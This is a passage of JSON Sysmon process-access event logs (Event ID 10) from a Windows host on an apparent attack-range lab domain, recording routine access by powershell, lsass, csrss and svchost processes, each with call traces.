663d634a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8160(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4693(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4286(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3faf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85095(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae1(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b1(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","SourceProcessId":"4152","SourceThreadId":"2008","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3faf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85095(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66394816(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8160(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4693(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4286(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3faf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85095(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae1(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b1(wow64)","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 